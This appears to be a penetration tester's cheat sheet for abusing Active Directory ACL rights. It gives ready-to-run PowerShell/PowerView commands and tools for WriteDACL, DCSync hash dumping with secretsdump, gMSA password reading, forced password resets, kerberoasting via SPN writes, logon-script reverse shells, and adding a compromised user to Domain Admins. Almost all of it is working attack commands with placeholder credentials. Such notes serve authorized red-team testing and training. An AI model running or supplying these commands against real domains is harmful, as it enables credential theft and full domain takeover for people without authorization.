Write DACL
$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPassword
Add-ObjectACL -PrincipalIdentity compromiseduser -Credential $cred -Rights DCSync
From the attacking box
secretsdumps.py $domain/user@$ip
GetChangesAll (DCSync)
From the attacking box
secretsdump.py domain/user@ip
Or use Mimikatz
ReadGMSApassword
Remotely
You may need to use ntpdate $domain if you get clockscrew error
python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p Password
Locally
.\GMSAPasswordReader.exe --AccountName 'ReadGMSApassword_Rights_To_User'
ForceChangePassword
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
$LateralEscUserPass = ConvertTo-SecureString 'LateralEscUserPass' -AsPlainText -Force
Set-DomainUserPassword -Identity LateralEscUserName -AccountPassword $LateralEscUserPass -Credential $Cred
GenericAll
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
Invoke-Command -computername 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity LateralEscUserName -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'password' -force)} -Credential $cred
GenericWrite
Use this for reverseshell using scriptpath=, enumeration, or use serviceprincipalname= for kerberoast
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
Set-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{serviceprincipalname='thescriptkid/thescriptkid'}
Get-DomainSPNTicket -Credential $Cred LateralEscUserName | fl
OR
Set-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{scriptpath='C:\\path\\to\\script.ps1'}
WriteOwner
$CompromisedUserName = 'CompromisedUserName'
$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass
Set-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity CompromisedUser
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity CompromisedUser -Rights All
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'CompromisedUser' -Credential $Cred
Automation
Find ACLs of interest whether it be the current compromised user, or users found. start with current user.
Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.identityreferencename -like "*CompromisedUser*"}
Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.identityreferenceclass -ne "computer"}